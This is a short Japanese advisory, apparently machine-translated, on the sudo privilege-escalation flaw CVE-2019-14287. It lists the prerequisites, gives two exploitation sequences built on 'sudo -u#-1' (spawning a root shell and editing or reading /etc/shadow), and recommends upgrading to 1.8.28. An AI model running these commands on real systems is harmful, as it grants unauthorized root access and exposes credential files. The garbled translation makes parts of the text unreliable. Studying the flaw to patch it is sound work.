CVE-2019から14287 sudoの設定ミス - 特権昇格の脆弱性の警告
0x00の脆弱性の背景
2019年10月14日、正式発行された脆弱性のアラートCVE-2019から14287でsudoがあります。
すべてのUNIXオペレーティングシステム(BSD、MacOSの、GNU / Linuxの須藤 ) 実質的に統合されたユーザーアクセス制御/切替プログラム。これにより、管理者は、ユーザーが切り替えることができるサーバーでユーザー権限を制御することができます。
特定のペイロードを通じ、ユーザーがroot権限にアップグレードすることができます。
0x01のは前提を活用します
sudoを-v <1.8.28
現在のユーザのパスワードを知っている
現在のユーザーのは、sudoを許可リストに存在します
0x02の道の脆弱性
ALLが発生したキーワードを使用して設定ファイルの後。しかし、デフォルトsudoの設定ファイルは影響を受けません。
の/ etc / sudoersファイルの形であっ製造する場合、ファイルの構成は、脆弱性の原因:
これは* =(ALL、*)構成の形で、単純に実行されるユーザは、ALL(すべてのユーザ)と他方に切り替えることができますユーザーが操作をカリング。
しかし、エラーに起因する、QWE実際-u#-1のvi viのセキュリティポリシーに違反して、sudoを実行してrootとして実行します。
[su qwe]
[sudo -u root vim]
[sudo -u#-1 vim /etc/shadow]
[sudo -u#-1 vim /etc/passwd]
普通のユーザーは、編集の/ etc / shadowがrootアカウントのパスワードを置き換えることができますすることができます
0x03の脆弱性第二の方法
ALLが発生したキーワードを使用して設定ファイルの後。しかし、デフォルトsudoの設定ファイルは影響を受けません。
脆弱性につながる可能性の/ etc / sudoersの設定ファイルの形式がある場合:
[visudo]
[su qwe]
[sudo -u#-1 whoami]
[sudo -u#-1 /bin/bash]
[whoami]
[tail -3 /etc/shadow]
0x04の修正案
- 1.8.28バージョンをSUDOにアップグレードするための時間。
- 複合制限ロジックキーワードALLがあるかどうか検索は/ etc / sudoersファイル
